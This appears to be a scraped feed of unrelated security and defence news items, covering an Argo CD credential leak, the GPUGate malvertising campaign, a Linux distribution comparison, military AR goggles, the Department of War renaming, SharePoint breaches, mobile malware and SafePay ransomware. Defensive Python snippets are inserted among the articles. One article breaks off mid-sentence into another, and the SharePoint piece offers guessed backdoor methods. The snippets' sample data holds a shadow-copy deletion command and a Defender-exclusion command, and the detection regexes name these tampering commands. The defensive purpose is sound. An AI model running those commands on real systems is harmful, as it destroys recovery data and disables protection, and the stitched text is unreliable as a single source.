A critical vulnerability has been discovered in Argo CD that allows API tokens with limited permissions to access sensitive repository credentials.
The flaw in the project details API endpoint exposes usernames and passwords, undermining the platform’s security model by granting access to secrets without explicit permissions.
The vulnerability stems from an improper authorization check in the Project API, specifically the /api/v1/projects/{project}/detailed endpoint.
According to the vulnerability details, API tokens with standard project-level permissions, such as those for managing applications, can retrieve all repository credentials associated with that project.
The expected behavior is that any request for sensitive information, like secrets, would require explicit, elevated permissions. However, the actual behavior allows tokens with basic access to fetch this data.
Exploitation
This issue is not confined to project-specific roles. Any token holding the projects get permission is considered vulnerable, including tokens whose broader global policy grants it, for example the policy line p, role/user, projects, get, *, allow. This widens the potential attack surface significantly, as more general-purpose tokens could be used to exploit the flaw.
Exploitation is straightforward. An attacker in possession of a valid API token with the necessary permissions can make a simple authenticated call to the detailed project API endpoint.
The resulting JSON response will incorrectly include a repositories object containing plaintext username and password credentials for the repositories connected to the project. This allows an attacker to easily harvest credentials that can be used to access private source code repositories.
The consequences of this vulnerability are severe, as exposed credentials could lead to source code theft, malicious code injection into the CI/CD pipeline, and further compromise of development infrastructure.
The Argo CD development team has addressed the issue and released patches. Administrators are strongly advised to upgrade their instances to one of the following secure versions immediately to mitigate the risk:
v3.1.2
v3.0.14
v2.14.16
v2.13.9
Upgrading to a patched version will ensure that the API endpoint properly enforces permission checks and prevents the unauthorized disclosure of repository credentials.
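Two checks an administrator can run against their own deployment after reading the advisory, written here as an added example rather than Argo CD project code: a version comparison against the four fixed releases listed above, and an audit of an RBAC policy.csv for subjects that hold the projects get permission the advisory singles out. The sample policy is constructed.

```python
"""Added example (not Argo CD project code): two defensive checks for the
advisory above.

1. is_patched(): decides whether a reported Argo CD version string already
   carries the fix, using the four fixed releases the advisory lists
   (v3.1.2, v3.0.14, v2.14.16, v2.13.9). Release lines older than 2.13 have
   no fix and are reported as unpatched.
2. roles_granting_project_get(): scans an RBAC policy in the policy.csv
   format used by argocd-rbac-cm and lists every subject that is allowed
   'get' on 'projects', the permission the advisory says is enough to reach
   the detailed project endpoint.
"""
import re

# Fixed releases from the advisory, keyed by release line (major, minor).
FIXED_RELEASES = {
    (3, 1): (3, 1, 2),
    (3, 0): (3, 0, 14),
    (2, 14): (2, 14, 16),
    (2, 13): (2, 13, 9),
}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(version):
    """Return (major, minor, patch) from strings like 'v2.14.15' or '3.1.2+abc'."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Argo CD version: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version):
    """True if the version is at or above the fixed release for its line.

    Release lines newer than any listed fix (e.g. a hypothetical 3.2.x) are
    assumed to include it; lines older than 2.13 have no fix and return False.
    """
    major, minor, patch = parse_version(version)
    line = (major, minor)
    if line in FIXED_RELEASES:
        return (major, minor, patch) >= FIXED_RELEASES[line]
    return line > max(FIXED_RELEASES)


def roles_granting_project_get(policy_csv):
    """Return subjects whose policy lines allow 'get' on the 'projects' resource.

    Each Argo CD policy line has the form
        p, <subject>, <resource>, <action>, <object>, <effect>
    A '*' resource or action is treated as matching, as it does in Argo CD RBAC.
    """
    subjects = []
    for raw in policy_csv.splitlines():
        text = raw.strip()
        if not text or text.startswith("#"):
            continue
        fields = [f.strip() for f in text.split(",")]
        if len(fields) != 6 or fields[0] != "p":
            continue  # 'g' group lines and malformed lines are skipped
        _, subject, resource, action, _obj, effect = fields
        if effect != "allow":
            continue
        if resource in ("projects", "*") and action in ("get", "*"):
            if subject not in subjects:
                subjects.append(subject)
    return subjects


# Constructed sample policy for demonstration; not taken from any real deployment.
SAMPLE_POLICY = """\
p, role/ci-deployer, applications, sync, my-project/*, allow
p, role/user, projects, get, *, allow
p, role/viewer, *, get, */*, allow
p, role/locked, projects, get, *, deny
g, alice, role/user
"""

if __name__ == "__main__":
    for v in ("v2.14.15", "v2.14.16", "v3.1.2", "v2.12.9"):
        print(v, "patched" if is_patched(v) else "UNPATCHED")
    print("subjects with projects get:", roles_granting_project_get(SAMPLE_POLICY))
```

Any subject the audit lists should be reviewed, and the instance upgraded before that permission is considered safe to keep.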
A sophisticated malware campaign, dubbed “GPUGate,” abuses Google Ads and GitHub’s repository structure to trick users into downloading malicious software.
According to the Arctic Wolf Cybersecurity Operations Center, the attack chain uses a novel technique to evade security analysis by leveraging a computer’s Graphics Processing Unit (GPU).
The campaign appears to be the work of a Russian-speaking threat actor and is actively targeting IT professionals in Western Europe.
The attack begins with malicious advertising, where attackers place a sponsored ad at the top of Google search results for terms like “GitHub Desktop.” This ad directs users to what appears to be a legitimate GitHub page.
Google search results for GitHub Desktop
In reality, the link leads to a specific, manipulated “commit” page within a repository. This page looks authentic, retaining the repository’s name and metadata, but contains altered download links that point to an attacker-controlled domain.
This “trust bridge” exploits the user’s confidence in both Google and GitHub to deliver the malicious payload.
What makes GPUGate particularly notable is its unique evasion method. The initial installer is a large 128 MB file, designed to bypass security sandboxes that often have file size limits.
weaponized GitHub Desktop
Its most innovative feature is a GPU-gated decryption routine. The malware will only decrypt its malicious payload if it detects a real, physical GPU with a device name longer than ten characters, Arctic Wolf said.
This is a deliberate tactic to thwart analysis, as the virtual machines and sandboxes used by security researchers often have generic, short GPU names or no GPU at all. On such systems, the payload remains encrypted and inert.
The primary goal of this campaign is to gain initial access to organizational networks for malicious activities, including credential theft, data exfiltration, and ransomware deployment.
By targeting developers and IT workers, individuals likely to seek tools like GitHub Desktop, the attackers aim for victims with elevated network privileges.
Once executed, the malware uses a PowerShell script to gain administrative rights, create scheduled tasks for persistence, and add exclusions to Windows Defender to avoid detection. The campaign has been active since at least December 2024 and represents an evolving and significant threat.
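A triage rule for the three behaviours attributed to the installer's PowerShell script (elevation, scheduled-task persistence, Defender exclusions), added here as an example and not taken from Arctic Wolf's report. The log records are constructed; the cmdlet and parameter names are real, but whether the campaign used exactly these is an assumption.

```python
"""Added example, not from Arctic Wolf's report: score PowerShell script blocks
for the behaviours the GPUGate write-up attributes to the installer's script.
The records below are constructed; a real source would be Script Block
Logging events (event ID 4104) from the Microsoft-Windows-PowerShell/Operational
channel, parsed into the same host/user/script shape (an assumption here).
"""
import re

# Each pattern names a behaviour and the cmdlets or tools that commonly
# implement it. Names are real PowerShell/Windows identifiers; their use by
# this specific campaign is an assumption of the example.
BEHAVIOURS = {
    "elevation": re.compile(r"Start-Process\b[^\n]*-Verb\s+RunAs", re.I),
    "scheduled_task": re.compile(
        r"Register-ScheduledTask\b|New-ScheduledTask\b|schtasks(\.exe)?\s+/create", re.I),
    "defender_exclusion": re.compile(
        r"Add-MpPreference\b[^\n]*-Exclusion(Path|Process|Extension)"
        r"|Set-MpPreference\b[^\n]*-Disable(RealtimeMonitoring|IOAVProtection)", re.I),
}


def classify_script_block(text):
    """Return the set of behaviour labels matched by one script block."""
    return {name for name, rx in BEHAVIOURS.items() if rx.search(text)}


def triage(records):
    """Score each record; all three behaviours together is the high-confidence case.

    records: iterable of dicts with 'host', 'user' and 'script' keys.
    Returns a list of (host, user, matched_behaviours, severity) for records
    that matched at least one behaviour.
    """
    results = []
    for rec in records:
        matched = classify_script_block(rec["script"])
        if len(matched) == 3:
            severity = "high"
        elif "defender_exclusion" in matched:
            severity = "medium"   # tampering with AV config is suspicious on its own
        elif matched:
            severity = "low"
        else:
            continue              # nothing of interest; drop from the output
        results.append((rec["host"], rec["user"], sorted(matched), severity))
    return results


# Constructed sample events. The first resembles the behaviour described in
# the article; the others are benign-looking admin activity for contrast.
SAMPLE_EVENTS = [
    {"host": "dev-laptop-07", "user": "CORP\\jdoe", "script": (
        "Start-Process powershell -Verb RunAs -ArgumentList '-File C:\\Users\\Public\\u.ps1'\n"
        "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'\n"
        "Register-ScheduledTask -TaskName 'GitHubDesktopUpdate' -Action $a -Trigger $t\n")},
    {"host": "build-01", "user": "CORP\\svc_build", "script":
        "Register-ScheduledTask -TaskName 'NightlyBuild' -Action $a -Trigger $t"},
    {"host": "hr-desktop-03", "user": "CORP\\asmith", "script":
        "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
]

if __name__ == "__main__":
    for host, user, behaviours, severity in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host:14} {user:16} {', '.join(behaviours)}")
```

The rule keys on the combination rather than any single cmdlet, since scheduled tasks and exclusions are routine on build and admin hosts.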
A new set of four malicious packages has been discovered in the npm package registry with capabilities to steal cryptocurrency wallet credentials from Ethereum developers.
“The packages masquerade as legitimate cryptographic utilities and Flashbots MEV infrastructure while secretly exfiltrating private keys and mnemonic seeds to a Telegram bot controlled by the threat actor,” Socket researcher
Penetration testing and ethical hacking have been dominated by specialized Linux distributions designed to provide security professionals with comprehensive toolsets for vulnerability assessment and network analysis.
Among the most prominent options, Kali Linux and Parrot OS have emerged as leading contenders, each offering unique approaches to cybersecurity operations.
This comprehensive analysis reveals that while Kali Linux maintains its position as the industry standard with superior community support and extensive documentation, Parrot OS presents compelling advantages in terms of resource efficiency, user-friendliness, and privacy-focused features that make it increasingly attractive for both beginners and professionals working with limited hardware resources.
Understanding Kali Linux
Kali Linux represents the gold standard in penetration testing distributions, developed by Offensive Security as a Debian-based system specifically engineered for cybersecurity professionals.
The distribution emerged as the successor to BackTrack OS and has maintained its reputation through consistent updates and comprehensive tool integration.
The latest Kali Linux 2025.2 update demonstrates the distribution’s commitment to staying current with emerging threats, incorporating 11 new tools, including goshs, graudit, hekatomb, and netexec, which address modern attack surfaces and cloud security challenges.
The system’s architecture prioritizes functionality over aesthetics, utilizing XFCE as the default desktop environment to maintain resource efficiency while providing a robust platform for security operations.
This design choice reflects Kali’s philosophy of creating a professional-grade environment that prioritizes performance and tool accessibility over visual appeal.
Kali Linux ships with over 600 pre-installed penetration testing tools, carefully curated to cover the complete spectrum of security assessment activities.
The toolset spans multiple categories, including network scanning, vulnerability analysis, exploitation frameworks, digital forensics, and post-exploitation utilities. Notable tools include the Metasploit Framework for exploitation testing, Burp Suite for web application security assessment, Nmap for network discovery, and Wireshark for protocol analysis.
The distribution’s strength lies in its comprehensive coverage of penetration testing methodologies, with tools organized into logical categories that align with industry-standard testing procedures.
The inclusion of cutting-edge tools such as Sqlmc for SQL injection testing, Sprayhound for password spraying integrated with Bloodhound, and Obsidian for documentation purposes demonstrates Kali’s commitment to addressing evolving security challenges.
Kali Linux demands substantial system resources to operate effectively, requiring a minimum of 2 GB RAM with 4 GB recommended for optimal performance. Storage requirements are equally demanding, with 20+ GB needed for a complete installation. The distribution requires modern hardware capabilities, including graphics acceleration for certain operations, making it less suitable for older or resource-constrained systems.
Despite these requirements, Kali Linux has made efforts to optimize performance, including the transition from GNOME to XFCE in 2019 to reduce resource consumption. The system supports various deployment scenarios, from bare metal installations to virtual machine environments, providing flexibility for different operational needs.
Understanding Parrot OS
Parrot OS emerged in 2013 under the leadership of Lorenzo Faletra, positioning itself as a security-focused distribution that balances comprehensive functionality with resource efficiency. Unlike Kali’s singular focus on penetration testing, Parrot OS adopts a broader approach, integrating security tools with privacy protection, digital forensics capabilities, and development environments.
The distribution utilizes the MATE desktop environment as its default interface, providing an intuitive and lightweight experience that remains accessible to users across different skill levels. This design choice reflects Parrot’s commitment to creating a user-friendly environment that doesn’t sacrifice functionality for ease of use.
Parrot OS distinguishes itself through its holistic approach to cybersecurity, offering not only penetration testing tools but also integrated privacy and anonymity features.
The distribution includes over 600 tools covering penetration testing, digital forensics, cryptography, and privacy protection. Key privacy tools include Tor Browser, AnonSurf for traffic anonymization, and zuluCrypt for encryption operations.
The system’s tool selection mirrors much of Kali’s functionality while adding unique capabilities focused on privacy protection and secure communications. Tools like ExifTool for metadata analysis, Maltego for intelligence gathering, and Volatility for memory forensics provide comprehensive coverage of modern security assessment needs.
One of Parrot OS’s most significant advantages lies in its exceptional resource efficiency. The distribution requires only 320 MB RAM minimum, with 2 GB recommended for optimal operation. Storage requirements are equally modest at 15+ GB, making it suitable for deployment on older or resource-constrained hardware.
This efficiency extends to its overall performance characteristics, with Parrot OS demonstrating superior performance on systems with limited resources while maintaining full functionality.
The distribution’s ability to operate effectively on older hardware makes it particularly attractive for educational environments and organizations with budget constraints.
Kali Linux vs Parrot OS comparison
Direct Performance and Feature Comparison
System Resource Analysis
The most striking difference between these distributions lies in their resource consumption patterns. Kali Linux demands significantly more system resources, requiring 2 GB RAM minimum compared to Parrot OS’s 320 MB minimum. This disparity becomes more pronounced in storage requirements, with Kali needing 20+ GB versus Parrot’s 15+ GB.
Performance testing reveals that Parrot OS consistently outperforms Kali Linux on identical hardware configurations, particularly on systems with limited resources. This efficiency advantage makes Parrot OS particularly suitable for virtual machine deployments where resource allocation is constrained.
Tool Coverage and Specialization
Both distributions offer comprehensive tool coverage with over 600 pre-installed applications, but their focus areas differ significantly. Kali Linux concentrates primarily on penetration testing and security auditing tools, with recent updates adding specialized tools for emerging attack vectors and cloud security. The distribution’s tool selection reflects its professional focus, with each tool carefully vetted for reliability and effectiveness in security assessments.
Parrot OS provides similar penetration testing capabilities while expanding coverage to include privacy tools, cryptographic utilities, and digital forensics applications. The distribution’s unique privacy-focused tools, including AnonSurf and integrated Tor functionality, set it apart from Kali’s more traditional approach.
Community Support and Documentation
Kali Linux benefits from extensive community support backed by Offensive Security’s professional development team. The distribution’s documentation is comprehensive, covering everything from installation procedures to advanced exploitation techniques. The large user base ensures rapid problem resolution and extensive third-party resources.
Parrot OS maintains an active but smaller community focused on collaborative development and user support. While the community is enthusiastic and responsive, the resource base is more limited compared to Kali’s extensive ecosystem. Documentation quality is good but less comprehensive than Kali’s extensive knowledge base.
Security Professionals Usage
Kali Linux maintains its position as the industry standard for professional penetration testing, with many cybersecurity certifications specifically requiring Kali proficiency.
The OSCP (Offensive Security Certified Professional) certification, widely regarded as a premier penetration testing credential, mandates Kali Linux usage throughout the examination process.
Professional security teams consistently choose Kali Linux for formal assessments due to its reputation, comprehensive documentation, and industry acceptance. The distribution’s regular updates and professional backing provide confidence in enterprise environments where reliability is paramount.
Kali Linux presents a steeper learning curve, requiring significant technical expertise to utilize effectively. The distribution’s command-line intensive approach and extensive tool selection can overwhelm beginners, making it more suitable for experienced professionals.
Parrot OS offers a more accessible entry point for cybersecurity education, with its user-friendly interface and intuitive organization making it ideal for students and professionals transitioning into security roles. The distribution’s emphasis on usability doesn’t compromise its professional capabilities, providing a balanced learning environment.
Kali Linux excels in formal penetration testing scenarios, professional security assessments, and environments where industry-standard compliance is required. Its comprehensive tool coverage and regular updates make it ideal for security consultants and enterprise security teams.
Parrot OS demonstrates superior performance in resource-constrained environments, privacy-focused operations, and educational settings. The distribution’s lightweight nature and privacy tools make it particularly suitable for research activities and situations requiring operational security.
The cybersecurity landscape continues evolving with new attack vectors, cloud security challenges, and IoT vulnerabilities requiring specialized tools and approaches. Kali Linux 2025.2 addresses these challenges with new tools specifically designed for modern threat landscapes, including hekatomb for credential extraction and netexec for large network exploitation.
Parrot OS responds to privacy concerns and surveillance issues by strengthening its anonymity features and secure communication tools. The distribution’s focus on privacy protection aligns with growing concerns about digital surveillance and data protection.
Modern cybersecurity operations increasingly rely on virtual environments, cloud deployments, and resource-efficient solutions. Parrot OS positions itself advantageously in this trend through its exceptional resource efficiency and virtual machine optimization.
The distribution’s ability to operate effectively on minimal resources makes it ideal for cloud-based security operations and containerized deployments.
Kali Linux addresses these trends through improved virtualization support and ARM architecture compatibility, though its resource requirements remain higher than those of alternatives.
Recommendations
The choice between Kali Linux and Parrot OS ultimately depends on specific operational requirements, available resources, and user expertise levels.
Kali Linux remains the definitive choice for professional penetration testers, security consultants, and organizations requiring industry-standard compliance. Its comprehensive tool coverage, extensive documentation, and professional backing make it indispensable for formal security assessments and certification preparation.
Parrot OS presents a compelling alternative for educational environments, resource-constrained operations, and privacy-focused activities. Its lightweight architecture, user-friendly interface, and comprehensive privacy tools make it particularly suitable for students, researchers, and professionals working in sensitive environments.
For experienced cybersecurity professionals working in enterprise environments, Kali Linux provides the reliability, tool coverage, and industry acceptance necessary for professional operations. For beginners and privacy-conscious users, Parrot OS offers an accessible entry point with powerful capabilities and resource efficiency.
Organizations with mixed requirements might benefit from deploying both distributions, utilizing Kali for formal assessments and Parrot for research and development activities.
The future of soldier “super goggles,” designed to give frontline troops an AI-enabled view of the battlefield and voice command over drone swarms, is unlikely to look like the bulky, Star Wars-style face computer that might come to mind. Instead, the new tech may look more like the glasses you could see on patrons in a Brooklyn coffee shop, according to the company chosen to make them.
The Army has awarded a $200 million contract to a startup called Rivet to develop prototype computers, goggles, and watches to give soldiers a battlefield intelligence edge, as part of the Soldier Borne Mission Command program. A joint team from tech giants Anduril and Meta will also design a prototype for consideration under a similar contract, according to people familiar with the matter.
Palmer Luckey, founder of Anduril, hasn’t been shy about his hopes to become the supplier of hands-free augmented reality kits for soldiers and, from there, build out an entire human-machine “ecosystem” to connect operators to drones and AI aides. And as the creator of the Oculus virtual-reality game system, he has something of an advantage. A February blog post featured him with a lab prototype of the Anduril system that looks like something out of science fiction.
But Rivet’s offering looks very different. Dave Marra, Rivet’s founder, told Defense One on Friday that his approach boils down to four words: “comfort, organization, utility, and compliance.”
He sees his company’s prototype as a jumping-off point to connect soldiers with a wide array of AI capabilities through simple voice or other commands, as well as to connect logistics professionals, maintainers, and others with AI-enabled tools.
“These kinds of natural language interactions are the most critical element to enable,” Marra said. “So you think, ‘I have to control robots, and I have to do it without significant training and learning. I want to recognize nouns on the battlefield that could be a target: that could be a good guy, a bad guy, or another noun on the factory floor. I want to identify anomalies, more importantly, correlate in these data sets.’"
The end result is real-time predictive intelligence delivered directly to the eye—information about how the battlefield is changing and might change, or, in another context, which part might break next and what to do about it. Eyewear that sees probabilities in the future.
The project is part of the Army’s broader pursuit of soldier-borne smart systems, going back more than a decade, before even the Integrated Visual Augmentation System program, which essentially became SBMC. But prototypes from those efforts have faced a number of setbacks.
Now, Rivet has created what it calls an “integrated task system.” It features a small computer soldiers carry, as well as glasses capable of night vision, map display, and a wide array of applications. They look like something you could buy at the mall. That’s part of the point. They were engineered to be useful in conditions where earlier soldier vision displays failed.
“If you’re wearing a pair of glasses on your face, they’ve got to conform to compliance measures for eye protection—not only from a ballistics perspective, but also adversarial lasers. You’re not going to be able to get that at Best Buy,” Marra said.
The system also runs on Android, to better allow operators to configure features to suit their needs. That flexibility reflects the Pentagon’s new approach of pushing more command and purchasing authority down to individual units—the people actually using the equipment who need to adjust it for rapidly changing conditions.
Marra said the company is working directly with soldiers to understand those conditions, beyond scheduled touch points.
“We’ve gone out and tested it at a high frequency with operational units at scale,” he said. “Over the next 18 months, we’re going to do exactly that. In fact, we’ve programmed every 45 or 90 days, we’re going to be out with a minimum of a squad’s worth of systems, a dozen systems, and we’re going to go do soldiering with the soldier. We’re going to hang out with them every minute of that 72-hour mission, or every minute of that training evolution, and take your feedback and put it into the next iterative loop of hardware and software development.”
By contrast, Anduril’s offering is bolstered by the Lattice platform, an AI-powered software system that combines thousands of data streams into a single 3D interface. Lattice—more than the headset—is core to Luckey’s vision of building out the “human-machine ecosystem.”
But Anduril is not alone in that space. Palantir has its own suite of battlefield data-integration products. Marra, who previously worked at Palantir, described that company as a “strategic partner.”
President Donald Trump signed an executive order Friday to rename the Department of Defense as the Department of War.
Just before Trump signed the order in the Oval Office late Friday afternoon, he and Pete Hegseth, the secretary in charge of the department, who stood next to Trump during the signing, said the renaming reflected their intention to return to a more aggressive mindset for the military.
“It's restoring, as you've guided us to, Mr. President, restoring the warrior ethos,” Hegseth said. “The War Department is going to fight decisively, not endless conflicts. It's going to fight to win, not not to lose. We're going to go on offense, not just on defense. Maximum lethality, not tepid legality. Violent effect, not politically correct. We're going to raise up warriors, not just defenders.”
The text of the order calls "Secretary of War" a "secondary" title for Hegseth. "The Secretary of Defense is authorized the use of this additional secondary title — the Secretary of War — and may be recognized by that title in official correspondence, public communications, ceremonial contexts, and non-statutory documents within the executive branch," reads the order.
The Department of War and the Department of the Navy were Cabinet departments from the nation's founding until 1947, when Congress combined them, along with the Department of the Air Force, into a new National Military Establishment. Congress changed that name to the Defense Department two years later.
Trump said Friday that the renaming 76 years ago revealed a “political correctness” in the military that contributed to poorer results on the battlefield. The U.S. has not won a major war since the reorganization, he said.
“We could have won every war, but we really chose to be very politically correct or wokey, and we just fight forever and then, we wouldn't lose, really, we just fight to sort of tie,” he said. “We never wanted to win wars that every one of them we would have won easily with just a couple of little changes or a couple of little edicts.”
Because the department’s name came from an act of Congress, it’s unclear if Trump has the power to rename it with an executive order.
The president said Friday he didn’t know if it would be necessary for Congress to be involved, but that he would ask lawmakers to approve the change.
“I don't know, but we're going to find out,” he said when asked if Congress would codify the renaming. “But I'm not sure they have to … There's a question as to whether or not they have to, but we'll put it before Congress.”
Trump added that the cost of replacing signage and other materials associated with the department would be minimal.
The order says: "Within 60 days of the date of this order, the Secretary of War shall submit to the President, through the Assistant to the President for National Security Affairs, a recommendation on the actions required to permanently change the name of the Department of Defense to the Department of War. This recommendation shall include the proposed legislative and executive actions necessary to accomplish this renaming."
Sen. Mitch McConnell of Kentucky, the chair of the Appropriations subcommittee with jurisdiction over the department who has often clashed with Trump, including on defense spending, said on social media that the name change was not meaningful without greater financial investment.
“If we call it the Dept. of War, we'd better equip the military to actually prevent and win wars,” the former Senate Republican leader wrote. “Can't preserve American primacy if we're unwilling to spend substantially more on our military than Carter or Biden. ‘Peace through strength’ requires investment, not just rebranding.”
A recent investigation has revealed that Microsoft employed China-based engineers to maintain and support SharePoint software, the same collaboration platform that was recently compromised by Chinese state-sponsored hackers.
This revelation raises significant concerns about cybersecurity practices and potential insider threats within critical infrastructure systems used by hundreds of government agencies and private companies.
The cybersecurity incident, which Microsoft disclosed last month, involved sophisticated attacks on SharePoint “OnPrem” installations beginning as early as July 7, 2025.
Chinese hackers successfully exploited vulnerabilities in the on-premises version of SharePoint, gaining unauthorized access to computer systems across multiple high-profile targets, including the National Nuclear Security Administration and the Department of Homeland Security.
The attack demonstrated advanced persistent threat capabilities, with hackers maintaining access even after Microsoft’s initial security patch on July 8.
ProPublica analysts identified the concerning operational structure through internal Microsoft work-tracking system screenshots, revealing that China-based engineering teams had been responsible for SharePoint maintenance and bug fixes for several years.
This discovery adds a troubling dimension to the security breach, as the same personnel tasked with maintaining the software’s integrity may have inadvertently created vulnerabilities that adversaries could exploit.
The technical scope of the vulnerability was extensive, with the U.S. Cybersecurity and Infrastructure Security Agency confirming that the exploits enabled attackers to “fully access SharePoint content, including file systems and internal configurations, and execute code over the network.”
The attack vector allowed for remote code execution, effectively granting hackers administrative privileges over compromised systems.
Persistence and Evasion Mechanisms
The SharePoint exploit demonstrated sophisticated persistence tactics that allowed attackers to maintain access even after initial remediation efforts.
When Microsoft released the first security patch on July 8, the threat actors quickly adapted their methods to bypass the new protections, forcing the company to develop additional “more robust protections” in subsequent patches.
The persistence mechanism likely involved embedding malicious code within SharePoint’s configuration files and leveraging the platform’s extensive file system access capabilities.
Attackers could establish backdoors by modifying authentication modules or creating hidden administrative accounts within the SharePoint infrastructure. This approach enabled sustained access to sensitive government and corporate data while remaining undetected by standard security monitoring tools.
Microsoft has acknowledged the security implications and announced plans to relocate China-based support operations to alternative locations.
The company emphasized that all work was conducted under U.S.-based supervision with mandatory security reviews, though experts question whether such oversight measures adequately mitigate the inherent risks of foreign personnel handling sensitive system maintenance.
Cybercriminals unleashed a massive wave of mobile malware attacks during the second quarter of 2025, with security researchers detecting nearly 143,000 malicious installation packages targeting Android and iOS devices.
This surge represents a significant escalation in mobile cyber threats, affecting millions of users worldwide through sophisticated attack vectors designed to steal sensitive data, compromise financial information, and establish persistent backdoors on infected devices.
The malware landscape during Q2 2025 demonstrated remarkable diversity in both attack methodologies and target demographics.
Banking Trojans emerged as the dominant threat category, accounting for 42,220 malicious packages, while mobile ransomware Trojans contributed an additional 695 packages to the threat ecosystem.
The attacks primarily leveraged social engineering tactics, fake application stores, and compromised legitimate applications to infiltrate user devices, with cybercriminals showing increasing sophistication in bypassing modern security mechanisms.
Fake app store page distributing SparkKitty (Source – Securelist)
According to Kaspersky Security Network data, the quarter witnessed 10.71 million blocked attacks involving malware, adware, and unwanted mobile software.
Trojans represented the most prevalent threat type, comprising 31.69% of all detected malicious activities.
Securelist researchers identified several concerning trends, including the emergence of pre-installed malware on certain device models and the evolution of existing threat families to incorporate new evasion techniques.
Among the most notable discoveries was the SparkKitty malware, a sophisticated threat targeting both Android and iOS platforms with image-stealing capabilities.
This malicious application specifically targeted cryptocurrency wallet recovery codes stored as screenshots in device galleries, representing a direct threat to digital asset security.
The malware operated by masquerading as legitimate applications while secretly exfiltrating sensitive visual data to remote servers controlled by cybercriminals.
Advanced Persistence and Evasion Mechanisms
The technical sophistication of Q2 2025 mobile malware reached unprecedented levels, particularly in persistence and detection evasion strategies.
The Trojan-Spy.AndroidOS.OtpSteal.a exemplified this evolution by disguising itself as a Virtual Private Network client while implementing the Notification Listener service to intercept one-time password codes from messaging applications and social networks.
This approach allowed attackers to bypass two-factor authentication mechanisms by automatically forwarding intercepted codes to Telegram channels via automated bots.
The malware’s persistence mechanisms involved deep system integration, with samples like Trojan-DDoS.AndroidOS.Agent.a embedding malicious Software Development Kits directly into adult content viewing applications.
This integration technique enabled the creation of distributed denial-of-service botnets from compromised mobile devices, demonstrating how cybercriminals are adapting traditional attack methodologies for mobile platforms.
The embedded SDK allowed for dynamic configuration of attack parameters, including target addresses and transmission frequencies, providing attackers with flexible command and control capabilities.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A new ransomware threat has emerged as one of 2025’s most prolific cybercriminal operations, with SafePay ransomware claiming attacks against 73 victim organizations in June alone, followed by 42 additional victims in July.
This surge has positioned SafePay as a significant threat actor that security teams worldwide must understand and prepare to defend against.
Unlike traditional ransomware-as-a-service (RaaS) models that rely on affiliate networks, SafePay operates as a closed, independent group that maintains strict operational security.
The group’s rapid-fire attack methodology has proven remarkably effective, with more than 270 claimed victims documented throughout 2025.
Their operations target primarily mid-size and enterprise organizations across the United States, Germany, Great Britain, and Canada, focusing on industries critical to daily operations including manufacturing, healthcare, and construction.
Most affected industries (Source – Bitdefender)
The group’s emergence can be traced back to September 2024, arising in the aftermath of significant law enforcement operations that dismantled ALPHV (Black Cat) and severely disrupted LockBit’s infrastructure through Operation Cronos.
Bitdefender analysts identified portions of the SafePay ransomware that overlap with functionality associated with LockBit, specifically LockBit Black, though the two groups operate with distinctly different methodologies and encryption processes.
SafePay demonstrates an alarming capability to execute complete attack chains within 24-hour periods, moving from initial access through encryption with devastating efficiency.
SafePay’s Victims Claimed Per Day (Source – Bitdefender)
Their victim selection appears methodical, targeting organizations with revenues typically around $5 million, though outliers include entities with revenues exceeding $100 million and one victim surpassing $40 billion in revenue.
Encryption and Evasion Mechanisms
SafePay employs sophisticated technical approaches that distinguish it from other ransomware families.
The malware utilizes the ChaCha20 encryption algorithm, generating a unique symmetric key for each encrypted file while embedding additional keys directly within the ransomware executable.
This dual-key approach complicates recovery efforts and ensures that each victim’s encryption remains uniquely secured.
The ransomware demonstrates advanced defense evasion capabilities, including anti-debugging checks and the ability to terminate processes associated with anti-malware functions.
Upon execution, SafePay immediately begins removing volume shadow copies to prevent system restoration, then proceeds to encrypt files with the .safepay extension while deploying ransom notes named “readme_safepay.txt” in affected directories.
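A defender-side check for the host indicators listed above, written as an added example (not code from Bitdefender's report): it filters process-creation events for shadow-copy deletion and flags folders where `.safepay` files sit next to a `readme_safepay.txt` note. The report does not say which command SafePay uses to remove shadow copies, so the command patterns are an assumption covering the usual Windows methods; the events and paths are constructed samples.

```python
import re
from typing import Dict, List, Set

# Indicators named in the report
RANSOM_EXT = ".safepay"
RANSOM_NOTE = "readme_safepay.txt"

# The report says SafePay deletes volume shadow copies first; the exact command
# is not stated, so (assumption) match the common Windows ways of doing it.
SHADOW_DELETE = re.compile(
    r"(?i)(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
    r"win32_shadowcopy.*\.delete\(\)|wbadmin(\.exe)?\s+delete\s+catalog)"
)


def shadow_copy_deletions(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter Sysmon/EDR-style process-creation events for shadow-copy deletion."""
    return [e for e in events if SHADOW_DELETE.search(e.get("CommandLine", ""))]


def file_indicators(paths: List[str]) -> Dict[str, object]:
    """Find renamed (.safepay) files and ransom notes in a file listing, grouped by folder."""
    notes: Set[str] = set()
    encrypted: Set[str] = set()
    for p in paths:
        folder, _, name = p.lower().rpartition("\\")
        if name == RANSOM_NOTE:
            notes.add(folder)
        elif name.endswith(RANSOM_EXT):
            encrypted.add(folder)
    # A note sitting beside renamed files in the same folder is the strong signal
    return {"note_folders": notes, "encrypted_folders": encrypted,
            "likely_safepay": bool(notes & encrypted)}


def sample_events() -> List[Dict[str, str]]:
    """Constructed process events (not real telemetry) shaped like Sysmon Event ID 1."""
    return [
        {"Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
        {"Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
        {"Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows"},
    ]


def sample_paths() -> List[str]:
    """Constructed file listing (not from a real incident)."""
    return ["D:\\Finance\\Q2\\budget.xlsx.safepay", "D:\\Finance\\Q2\\forecast.docx.safepay",
            "D:\\Finance\\Q2\\readme_safepay.txt", "D:\\Finance\\archive\\old.zip"]
```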
One notable technical characteristic is the malware’s geographic targeting logic.
